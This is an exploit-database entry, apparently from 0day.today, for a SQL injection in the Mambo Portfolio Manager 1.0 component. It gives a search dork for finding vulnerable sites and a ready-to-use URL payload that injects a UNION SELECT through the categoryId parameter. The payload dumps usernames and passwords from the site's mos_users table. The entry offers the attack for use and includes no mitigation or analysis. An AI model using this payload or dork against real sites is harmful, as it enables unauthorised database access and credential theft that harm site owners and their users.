id: 2658
date: 02/18/2008
title: Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability
author: 0day Today Team
cves: 

======================================================================
Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability
======================================================================



#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*



#  0day.today [2023-03-23]  #